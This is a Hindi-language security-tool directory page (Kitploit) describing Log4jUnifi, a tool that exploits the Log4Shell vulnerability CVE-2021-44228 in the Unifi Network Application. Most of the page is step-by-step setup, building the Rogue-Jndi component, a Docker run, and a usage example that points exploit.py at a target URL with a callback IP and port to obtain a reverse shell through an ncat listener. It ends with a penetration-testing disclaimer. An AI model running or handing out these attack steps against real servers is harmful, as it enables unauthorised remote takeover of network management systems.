Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4jUnifi — Unifi Network Application में CVE-2021-44228 का शोषण करके रिमोट कोड निष्पादन और बहुत कुछ। | Kitploit
उपकरण/GitHubGitHub/puzzlepeaches/log4junifi
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubpuzzlepeaches/log4junifi

Log4jUnifi

Unifi Network Application में CVE-2021-44228 का शोषण करके रिमोट कोड निष्पादन और बहुत कुछ।

रिपॉजिटरी देखें
170312 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4jUnifi

Unifi Network Application में CVE-2021-44228 का शोषण करके रिमोट कोड निष्पादन और बहुत कुछ।

  • आग में एक और Log4j: Unifi

क्यों?

इस कमज़ोरी के प्रूफ ऑफ कॉन्सेप्ट बिखरे हुए हैं और इन्हें मैन्युअल रूप से करना होता है। यह रिपॉज़िटरी शोषण प्रक्रिया को स्वचालित करती है। पोस्ट-एक्सप्लॉयटेशन के लिए मार्गदर्शन हेतु ऊपर दिया गया ब्लॉग पोस्ट देखें।

इंस्टॉल

इस रिपॉज़िटरी का उपयोग मैन्युअल रूप से या Docker के साथ किया जा सकता है।

मैन्युअल इंस्टॉल

एक्सप्लॉइट को मैन्युअल रूप से डाउनलोड और चलाने के लिए, निम्नलिखित चरणों को निष्पादित करें। सबसे पहले, सुनिश्चित करें कि आपके हमलावर होस्ट पर Java और Maven इंस्टॉल हैं। Debian-आधारित ऑपरेटिंग सिस्टम पर apt का उपयोग करके ऐसा करने के लिए, निम्न कमांड चलाएँ:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

GitHub रिपॉज़िटरी को क्लोन करें और सभी Python आवश्यकताएँ इंस्टॉल करें:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && pip3 install -r requirements.txt

Log4jUnifi रिपॉज़िटरी के रूट से, नीचे दिए गए कमांड का उपयोग करके Rogue-Jndi प्रोजेक्ट को कंपाइल करें:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker इंस्टॉल

सबसे पहले, सुनिश्चित करें कि आपके हमलावर होस्ट पर Docker इंस्टॉल है। (मैं आपको यह करने की प्रक्रिया नहीं समझाऊँगा)

इसके बाद, रिपॉज़िटरी को क्लोन करने और हमारे द्वारा उपयोग किए जाने वाले Docker इमेज को बनाने के लिए निम्न कमांड निष्पादित करें।

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
    && cd Log4jUnifi && docker build -t log4junifi .

कंटेनर चलाने के लिए, अपने कमांड लाइन फ़्लैग्स जोड़कर निम्न जैसा कमांड चलाएँ। ध्यान दें कि कंटेनर रिवर्स शेल को कैप्चर नहीं करेगा। आपको एक अलग शेल सत्र में ncat लिसनर बनाने की आवश्यकता है:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi \ 
    -u https://unifi.acme.com:8443 -i 192.168.1.1 -p 4444

उपयोग

root@kitploit:~
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Unifi Network Manager base URL
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.

उदाहरण

अपने स्थानीय सिस्टम पर इंस्टॉल किए गए टूल का उपयोग करके रिवर्स शेल प्राप्त करें:

root@kitploit:~
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444

अस्वीकरण

यह टूल पेनेट्रेशन टेस्टिंग के दौरान उपयोग के लिए डिज़ाइन किया गया है; बिना पूर्व आपसी सहमति के लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की ज़िम्मेदारी है। डेवलपर्स कोई दायित्व नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।

टूल डाउनलोड करें